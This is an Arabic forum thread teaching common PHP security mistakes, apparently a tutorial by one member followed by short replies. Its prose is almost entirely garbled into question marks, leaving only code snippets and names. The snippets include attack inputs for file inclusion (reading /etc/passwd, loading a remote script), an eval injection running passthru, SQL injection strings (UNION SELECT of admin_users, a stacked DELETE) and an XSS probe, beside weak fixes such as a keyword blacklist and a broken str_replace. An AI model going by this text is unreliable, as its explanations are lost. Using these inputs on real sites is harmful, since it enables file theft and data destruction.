أخطاء المبرمجين الأمنية في php

[مهند قمرة]

????? ??? ?????? ??????? ????? ?? ?????? ??? ??????? ??????? ?????? ???? ?? ?????? ?? ???? ????? ?? ??????? ? ?? ?? ???? ???????? ???? ??? ?????? ????? ????? ?? ????????? ? ??? ??? ?? ??? ?? ?? ????????? ?? ??????? ??? ??? ??? ??????? ? ? ????? ??? ?????? ????? ??????? ????? ??? ?????? ????? ??????? ?????? ????? ??? ?? ?????? ?????? ?? ????? ? ????? ??????? ?????? ?? ??? ?? ?????? ????? ??? ???? ?? ?????? ?????? ??????? ? ????? ???? ????? ???? ???? ???????? ?? ???? ???? ?? ???? ? ?? ????? ??????.

1- ?? ???? ?? ??????? ????? ??? ???? ?? ??? ?????? ??? ??? ?????? ?? ??? ????? (???? ??? ??? ?????? ???????????? ? ?? ????? ??? ??) ? ?? ?? ?????? ????? include , require , ?? ?? ?? ???? ??????? ?????? ????? ??? ??????? ?? ??? ???????? ??? ?????? ?? ??? ????????.


????

كود: تحديد الكل

if(isset($page)) 
{ 
 include($page); 
}
 

??? ??? ?? ??? ?????? ?? ??? ????? $page ? ????? ??? ?? register_globals ?? ??? ??????? ??? ???? ??? ?????? ???????? ????? script.php?page=/etc/passwd
? ????? ??? ??? ??? ????? ?? ?????? ??? ??? ?? ??? ?? ??? ????? ????? ????? ?? ?????? ??? ?? ??? ??? ?? ????? ? ???? ?? ????? ?????? ??? /etc/passwd!!!!!

???? ????? ?? ????? ???? ??? ?? ????? ?? ??? ?? ???? ????????? ???? ?? ??????? ???? ?????? ????? ?? ????? ????.


????

كود: تحديد الكل

script.php?page=http://mysite.com/mal_script.php

?????? ??? ???????? ????? ?? ???? ??? ????? ??? ??????? ?? SSI ?? ????? ??????? ? ???? ?? ?????? ?? ??? ?????? ???????? ???? ????? ???? ????? ???? ??? ???????.



????

كود: تحديد الكل

$pages = array('index.html', 'page2.html', 'page3.html'); 
if( in_array($page, $pages) ) 
{ 
   include($page); 
{ 
else 
{ 
  die("Foot Bokra"); 
}
 

2- ????? ????? ??????? ?? ??? ???????? ?? ?????? eval ???? ??? ????? ???? ???????? ???? ?? ????? ?? ????? ???:

كود: تحديد الكل

script.php?input=;passthru("cat /etc/paswd");
 

? ??? ????? ????? ??? ????? ????? ??? /etc/passwd.
?? ??????? eval ???? ?????? ?????? ?? ??? ?????? ? ??? ???? ?? ????????? ??? ??????? ? ?? ??? ?????? ?? ??????? (Templates) ????? ?? ?????? ?????? ???????? ???????? ?? ??? ???????? ? ?????? ???? sprintf ????? ????.

[مهند قمرة]

3- ???? ?? ?????? ?? ????????? ????? ???????? SQL Statement ????? ?? ????? ????? ????? ??? ????? ?????? ?? ??? SQL ?????? ???? ????? \ ??? ???? ????? ????? ?????? GET , POST , COOKIE ? ???? ??????? ??? ??? ?????? ?? ??????? (') ? ?? ?? ???????? ?? ???? ????????? ????? ??? ??????? ??? ????? ????? ??? ???? ???????? ???? ????? \ ??? ?? ??? ?????? ????? (') ???? ?? ????????? ? ????? ??? ???? ???????? $name ?? ??????? form ? ???? ????????? ??????:

كود: تحديد الكل

UPDATE users SET Name='$name' WHERE ID=1;
 

??? ??? ??????? ????? ??? ????? (') ???? ???? ?????? ??????? \ ??? ????? ? ??????? ?? ???? ????? (') ??? ???? ????????? ? ?????? ?? ???????? ???? ???????? ???????:

كود: تحديد الكل

$name',Admin='1
 

???? ?????? ???????? ????? ????? ??? ?? ???? ????????? ? ??????? ??? ??? ????????? ???????? ? ??????? ??????? ?????? ???????

كود: تحديد الكل

addslashes() ??  mysql_escape_string()
 

??? ??????? ??????? ????? ?? ???? ???? ????????? ? ??? ???? ???????? ???????? ? ????? ?????? magic_quotes_gpc ??? ???? ?????? ??????? ???????? ? ????? ?? ?? ???? ?? ??? ??????? ? ?????? ??????? ?????? get_magic_quotes_gpc() ?????? ??? ???? ?? ??? ??????? ?? ?? ? ?????? ?? ??????? addslashes() ?? ???? ???? ??????? ?????? ?????? ??????? \ ??? ???????? ??????? ?? ??? ????????.

4- ??? ????? ????? ?????? ?? ????? ???????? ???? ?? ??????? ??? ??????? ?? ????? ???????? ? ??? ????? ???????? ?????? ?? ???? ???? ????????? ?????? ?? ? ?????? ????? ?? ???? ????????? ??????? Shared Hosting ??? ?????? ??? ?? ?? ???? ??? ??????? ???????? ??????? ?????? ???????? ? ????????? ????? ????? ?????? ???????? ?????? ??? ??? 3DES ?? AES5 ? ?????? ?? ??????? ????? ????? ?????? ?? ?? ???????? ?? ???? ???? ?????? ??????? ? ?????? ???????? ?? ??? ????? ?? ???? ????? ?? ??????? ? ?? ??????? ??? ????? key ????? ???? ?????? ? ? ??? ??? ????? ???????? ????? ???? ? ????? ??? ?????????? ????? ? ???? ?????? ???? ??????? ?? ??????? ???? ???? ??????? ??????? Session hash functions ??? ???? SHA-1 ?? md5.

[مهند قمرة]

5- ???? ????? ??? ??????? SQL
?????? ?? ???? ????????? ???? ???????? ?? ??????? ?????? ?? ??? ???????? ? ???? ?????? ??????:

كود: تحديد الكل

$stmnt = SELECT login_id FROM users WHERE user = '" .
$_POST["username"] . "' AND password = '" . $_POST["password"];
 

?????? ????? ?? ???????? ???? (#) ????? ?? ???? ?????? ?? ?? ???? ????????? ????? ???????:

كود: تحديد الكل

SELECT login_id FROM users WHERE user = 'hani'; #' AND password = ''
 

????? ??? ?????? ????? ???? ???? ????????? ??? ????? ???????? ????? (#) ? ?? ?? ????? ???? ?????? ?????!!
??? ?? ?? ??????? ??????? ?? ??? ?????? ???? ?? ????? ???????? ? ??????? ?????? ????? (#) ???? ???? ????????? ??? ????? (#) ???? ???? ?? ???? (???? ???? ?????????) ????? ?? ????? ? ???? ?????? ?????? ???????? addslashes().

6- ????????? ??? ??? ?? ????? ????? ????? ?????? ? ?? ??? ?? ???? ???????? ???? SHA-1 ? ????? MD5 ???? ?? ?????? ?? ?????????? ? ???? ???? ????? ??? 128-bit ??? ? ?? ????? ?? SHA-1 ???? ??? 160-bit ? ??? ??????? ?????:

كود: تحديد الكل

$insertSql .= "'" . sha1($_POST["password1"]) . ", ";
 

???? ?????? ???? ?? ?????? addslashes() ??? ????? ?????? ? ??? ???? ??? ???? ? ?? ?? SHA-1 ?????? ??? ??????? ????????? (Hexadecimal) ?? (0 ? 9 ? A - F) ????? ??? ?????? ?? ?????? ?? ?? ?????? ?????? ?? ??? ????????? ??? (').


??????? ?????? ?? ?????? ?????? ????????? (??????? ?? ??? ???????? ? ? ???????? ?????? ?? ????? ???????? ???????? ?????:

كود: تحديد الكل

$loginQuery .= " password = '". sha1($_POST["password"]) . "'";
 

??? ?? ?????? ?? ???? ?????? ??????? ????? ?????? ???? ?? ????? ???????? ???? ???? ??????? ??? ? ??????? ???????.

[مهند قمرة]

7- ??????? (Session)
????? ??????? ??????? ? ???? ???? ????? ?? ??????? ????? ??? ????? ???:
??????? ?????? ?? ???????? ?? ??????? ? ???? ?? ???? ????? ???? ?????? ??? ???? ??? ?????? ? ???? ???? ?????? ???????? ????? ??? ??? ???????? ? ?????? SSL ?? TLS ??? ???? ?????? ? ? ?? ???? ??????? ?????? session_set_cookie_params ?? ????? session.cookie_secure ?? ??? ini ? ? ???? ??????? ????? ???? ???????? ???? ????? ??? ?????? ??? ???? ?????? ?? ???? ??? ??? ??? ??????? ???? ??? ?????? ? ????????.
??????? ??????? ??? ?????? ??? ?? ???? ?????? ?? ??????? ???? ??? (??? ???? ??????? ???????? ?????) ??? ??????? ?????? ?????? ? ??????? ?????? ??? ???? ???? ?? ???? ? ? ???? ?????? ?? ??? ???? ?????? ???? ?? ????? ????????? (??? ???IP ?????) ?? ?????? ?? ???? ???? ??????? ???????? ?????? (SHA-1 ?? MD5) ? ??? ??? ????? ????? ??????? ????? ??? ??? ? ??? ?????? ????????? ???????? ? ?????? ???? ?? ??? ???? ?????? ???????? ?? ??.
??????? ??????? ? ?? ???????? ?????? ?? ??????? ????? ? ????? ????? ??? ???? ?????? ? ?? ?????? ??????? ??? ??? ??????? ?????? ????? ????? ?? ??? 1 ? 10.000 ? ???? ?????? ???? ?????? ??? ??? ???? ?? ?? ??????? ??? ??? ?? 128-bit.

????? ???? ????? ???? ?? ??? ?? ?????? ?? ???? ???? ???????? session_start() ???? ?? ???? ????? ???? ?????? ???? ????? ?????? ? ????? ???cookie ?? ???? session_generate_id ? ??? ??? ??? ???? ?????? ??? ???????? ???? ????? ????? ?? ????? ???????? ?? ??????

كود: تحديد الكل

$_SESSION["user"] = new User($userData->login_id, $userData->name, $userData->email, $userData->username);
 

???? ???????? ????? ??: ???? ?????? login_id ? ????? name ? ?????? email ? ??? ???????? username.

?? ??????? ???????? ??? ???? ?????? ????? ???????? IP ? ????? ???? ???? ??? ??????

كود: تحديد الكل

$_SESSION["IP"] = $_SERVER["REMOTE_ADDR"];
$_SESSION["timestamp"] = time();
 

???? ??? ????? ????? ??????

????? ??????? ? ?????? ?? ?????? ????????:
?????? ?? ?????? ???????? ?????? ???? ???? ?? ???????? ??? ?????? ?????? ? ?? ??????? ??????? ???? ???? ????? ????? ?? ??? ??? ???????? ??? ???????? ? ??? ???? ?????? ????????.
??? ???? ?????? "includes/session.inc.php" ????? ??? ????? ???????? (?????? ?????? ?? ??????? ???? ???? ???????( ? ? ???? ????? ?????? ?? ?? ???????? ?? ?? ???? ??????? ??????? ? ?????? ???????? ?? ?????? ?? ?? ?????? ?? ??????? ???? ???? ? ???? ????? ??? ?????? ???????? ???? ????? ????? ?????? ? ??? ??????? ?? ?????? ?? ?? ????????? ????? ?? ?????? $_SESSION

كود: تحديد الكل

if(!isset($_SESSION["user"])) {
  die("Not logged in");
}

????? ?????? ?? ???? ?????? ??? ???? ????? ?????

كود: تحديد الكل

if(!is_numeric($_SESSION["user"]->loginID)) {
  die("Not logged in");
}
 

???? ?????? ???? ???? ?? ?? ???? ?????? ?? ?? ???????? ????? ?????? ? ??? ???? ?? ???? ??? ??? ???????? ?? ???? ?????? ??????? ????? ?? ????? ????? ???IP ???? ?????? ????? ??? ?? ????? ???????? ???? ???? ????????

كود: تحديد الكل

if($_SESSION["IP"] != $_SERVER["REMOTE_ADDR"]) {
   header("Location: user_logout.php");

}

?? ?? ????? ?????? ????? ??? ???? ?? 30 ????? (1800 ?????) ??? ???? ?????? ????? ? ?????? 30 ????? ???? ?????? ? ??? ??? ???? ??? ???? ???????

كود: تحديد الكل

if((time() - $_SESSION["timestamp"]) > 1800) { 
header("Location: user_logout.php?timeOut=1 "); 
} 
else { 
$_SESSION["timestamp"] = time(); 
}
 

?? ????? ????? ???????? ????? ???? ??? ??? ?? ????? ???? ??? ?? ???? ???????? ???????? ??????? ?? ????? ?????? ??? ????? ???????? ? ????? ?????? ?????? ???????? ???? ???? ??? ?? ??? ???????? ??????? ??? ??????? IP ? ???????

كود: تحديد الكل

$_SESSION = array();

??? ??? ???? ????? ????? ?????? ??????

كود: تحديد الكل

session_destroy();

????? ??? ???? ?? ???? ???? ?????? ?? ???cookie

كود: تحديد الكل

unset($_COOKIE[session_name()]);

[مهند قمرة]

8- ???? ????? ??? ??????? SQL

?? ????? ????????? ??????? ??????? ?? ??????? ??? ????????? ?? ??? ?????? ?? ????????? ??????? ??? ???? ????????? ??? ?? ???? ?????? ??????? ??? ????? ?????? ??? ? ?? ?????? ?????? ?????? ???? ??????? ???????:

كود: تحديد الكل

$id = $_GET["id"];
$result = mysql_query("SELECT * FROM `articles` where id=$id;");
 

? ??? ??? ?? ??? ?????? ?? ??????? $id ???? ??? ???????? ????? ??? ?? ??? ?????? ?????? ??????? ?? ???? ??????? ???????? ?

كود: تحديد الكل

Page.php?id=0 UNION SELECT * FROM `admin_users`

????? ???? ????????? ??????:

كود: تحديد الكل

SELECT * FROM `articles` WHERE id=0 
UNION SELECT * FROM `admin_users`;
 

??? ??? ???? ?????? ????? ?? ??????? ?????? `admin_users` ? ?? ?????? ?? ??????? ???? ??? ????? ? ? ???? ??? ?? ??????? $id ?? ??? ??? ????? ?????? ?? ??? ??? (???) ? ???? ??????? ???? ??????? ??????? ? ??? ?????? ??? ?????? ???????? ???? intval ?????:

كود: تحديد الكل

$id = intval($_GET["id"]);

??? ??????? ??????? ? ??????? ?? ????:

كود: تحديد الكل

$id = $_GET["id"];
If (!is_numeric($id)) {
???????.echo "foot bokra"
} else {
???????.continue
}

? ????? ??? ? ??? ??????? ????? ?? ??:

كود: تحديد الكل

$name = $_GET["name"];
$result = mysql_query("SELECT * FROM `articles` 
WHERE title=\"$name\";");
 

? ??? ??? ?? ??? ?????? ?? ??????? $name ???? ??? ???????? ????? ??? ?? ??? ?????? ?????? ??????? ?? ???? ??????? ???????? -

كود: تحديد الكل

Page.php?name= UNION SELECT * FROM `admin_users` 
WHERE name="%

??? ???? ???????????? ?? ??????? ?????? `admin_users` ? ??????? ???? ??? ????? ? ???? ??? ?? ??????? $name ?? ????? ??? ??? ????? ?????? ?? ??????? ?????? $name ????? ??? ?? (???) ? ???? ??????? ?????? ?? ?? ?????? ?? (???) ? ????? ???? ????????? ? ??? ??????? ?????? ???:

كود: تحديد الكل

$name = str_replace("\"", """, $_GET["name"]);
 

??? ??????? ??????? ??? ??????:

كود: تحديد الكل

$name = str_replace("\"", "\\\"", $_GET["name"]);

[مهند قمرة]

9- ???? ????? ??? ??????? SQL

?????? ?? ?????? ???????? ?? ???? ????????? ???????? ??? ??? ???????? ?? ???? ???? ?????? ??????? ??? ????????? ????? ??? ????? ?????? ???? ????? ???????? GET ??? ?????? POST ?? ??? ??????:

كود: تحديد الكل

$query = "SELECT id, name FROM `records` LIMIT "
        . $_POST['NUM'];
$result = $db->select($query);
 

? ??? ??????? ?????? ???????:

كود: تحديد الكل

<form action="form.php" method="POST">
<input type="text" name="NUM"
       value="5; DELETE FROM `records`">
<input type="submit">
</form>
 

???? ???? ????????? ??????:

كود: تحديد الكل

SELECT id, name FROM `records` LIMIT 5; 
DELETE FROM `records`
 

? ??? ???? ????? ????? ??? ????? ??? ??????? ?? ??? ??? ????? ?? ??????? ?? ???? ??????? ??? ????????? ? ???? ??? ?????? ??????? ?????? ??? ????????? ? ??????? ????? ??? ?? ??? ???????:

كود: تحديد الكل

function filter_sql($input) {
   $reg = "(delete)|(update)|(union)|(insert)";
   return(eregi_replace($reg, "", $input));
}
 

10- ????? ??????? ????????? Cross-Site Scripting XSS

?? ??????? ??????? ??????? ??????? ?????????(XSS) ? ?? ????? ??????? ????? ?????? ???? ?? ?????????? ??????? ?????? ??????? ?????? ?? ?????? ??????? ? ???????? ? ????? ????? ? ? ??????? ?? ??????? ???? ?? PHP ??? ? ???? ?? ?? ??? ?????? ??? ??????? ?? ?????? ? ?? ???? ???? ??????? ???? HTML ? Javascript ?? ?????? ?? ???? ??????? FORMS ??? ???? ????? ?? ???? ???????? ??????? ????? ?????? ???? ???? ???????? ?? ???????? ?? ?? ???? ??? ?? ??? ?? ????? ???????? ? ? ?????:

كود: تحديد الكل

$note = $_GET["note"];
If ($note) {
   echo $note;
}

?????? ???????? ????? ?????? ??????? ?? ???? ???? ??????? ?? ???????:

كود: تحديد الكل

Page.php?note=<script>alert("pop up");</script>

??? ???? ???? ??? ??????? ????? ???? HTML ? Javascript ??? ???????? ? ??? ???? ?????? ????? ? ?????? ????????? ??? ????? ?????? ? ???... ??? ?? ????? $note ? ????? ?????? ????????? ????? ???? ???? ??????? ???? ?????? ? ?????? ??????? ????? ????? ???? Javascript ?????? ??????? ?????? ??? ???? ???? ?? ??? ??? ?? ????? ?? ??????? pop up (? ??????? ??????? ???? ????? ?? ? ?? ?????? ??? ?? ?????? ??? ?????? ?? ??? ?????) ? ???? ?? ???? ???? < > ??? ?? ?????? ??????:

كود: تحديد الكل

$escapeChars[0] = array('<', '>');
$escapeChars[1] = array("&lt;", "&gt;");
$note = str_replace($escapeChars[0],$escapeChars[1],$_GET["note"]);
 

? ?????? ??????:

كود: تحديد الكل

$escapeChars[0] = array('<', '>');
$note = str_replace($escapeChars[0], "", $_GET["note"]);
 

???? ???? ??? ?????? ??? ??? ???? ??? ??????? ?? ?????? ? ?? ??????? ???? htmlentities() .



11- ??? ???? ????????

?? ?????? ?????? ????? ??? ???????? ?? ?? ??????? ???? ???? ???????? ????? ? ??????? ? ?????? ??? ??????? ? ?????? ?? ??????????? ? ? ??????? ?? ??? ?????? ?? ???? ???????? ??????? ???? ?????? ?????? ? ??????? ???? ?? ??? ???? ???? ???????? ? ???? ???? ??? ???????.

- ??? index.php ???? ?????? ?? ?????? ?????? Root.
- ????? ??????? ?????? ??? Config ???? ?? ???? ? ???? ???? ??? ???? ?????? /lib/.
- ????? ??????? ???? ?? ???? ???? ??? ???? ?????? /tpl/ ? ??? ????? ?????? ???????? ??? .htaccess.
- ????? ?????? Classes ???? ?? ???? ???? ????? /classes/ ? ??? ????? ?????? ???????? ??? .htaccess.
- ????? ????? ????? ?? ???? /images/.
- ??? ??? ?????? ????? ???? ?????? ActionScript ?????? ??? ?????? ????? ? ???? ???? /flashscr/.

??? ?? ???? ???? ?????? ?????? ???? ??????? ???????:

- ?? ?? ????????? ???????? ?? ??? index.php ???? ??????? parameters ??? ???? ????? ?????? ?? ????? ????? ?????? ???????? ??? ??? ????? ??????? ???? ????? ???? ???????? ?? ??? ???????.
- ???? ?????? ??????? FORMS ?????? ???????? ???? ???????? ??? ??? ????? ?????? ???????? ??? ?????? ???????: ?class=account&action=login ??? ???? ??????? ???? ????? ??? ? ??? ????? ?????? ???????? ?? ?? ???? ??????????.
- ???? ???????? ??????? ?? ????? ???????? ????? ??? ???????? ?? ???????? ??? ????? ??? ??? ????? ?????? ?????? ??????? ?? ??????? ????? ?? ???? ??? ????? ??????? ? ??????? ?? ??? ?????? ?? ??????? ??????? ???? index.php.


index.php
|
|--- ??? ????? ???????
|
|--- ????? ?????????
|--- ???????
|--- ???????
|--- ???? ????????
|--- ???????
|
|-----------|
|
|--- ????? ??????
|--- ???.???????
|--- ???.???????
|--- ???.???????
|--- ???.????????
|
||--- ???.???????
||
||--- ???? ???????
|
|--- ????? ????????


? ?????? ?????? ???? ??? ?????? ?? ??? ???? ???????? ??? ? ??? ???? ? ?? ??????? ?? ???? ??? ???? ?? ??????? ???????? ???????:

- ????? ???? ???????? ??????? (???? ??? ?????) ?? ??? ???????? ?? ????? ???????? ?? ???? ???? ??? ????? ???????.
- ????? ? ??? ???? ??????? ?? ???? ???? ??? ????? ???????.
- ?? ??? ?? ????? ?????? ???? ???? ??????? ?????? ???? ????? ???????? ??????? ? ??????? ?? ????? ?? ?????? ?????? ?? ??? ????? ???????.

?????? ?? ????? ?? ??? ?? ???? ?????? ?????????? ????? ??? ????? ???????? ???? ? ???? ?????? ??? ?????? ???? ?????.

[مهند قمرة]

??? ??????? ????? ?? ??????? ????
??????: ???? ????
????? ??????:
http://www.zajilnet.com/forum/index.php?showuser=3616
------------------------------
??? ??? ???? ??????? ??????? ????????

[arabstar]

???? ?? ??? ??? ?????? ?????? ????? ??????

??? ?????

[قلب العالم]

?????? ????? ????? ???? ???????

????? ??? ??? ??????? ????????? ???? ??????

????? ??? ??????? ????? ?????? ????? ?? ????? ?????

???????

[ArabFriends]

???? ??? ??????? ??? ???? ????,
??? ???? ????

?? ????? ?????

????? ??? ?????? ?????? ??? ??? ??????,
??? ???? ???? ?? ??? ????? ?? ??? ????? ? ???????? ?????? ???? ??? ?????? ?? ????? ??? ?????? ???? ???

[عبقري العرب]

???? ????? ???????
? ??? ???? ??? ?????? ????? ????? ?? ???? ??? ???????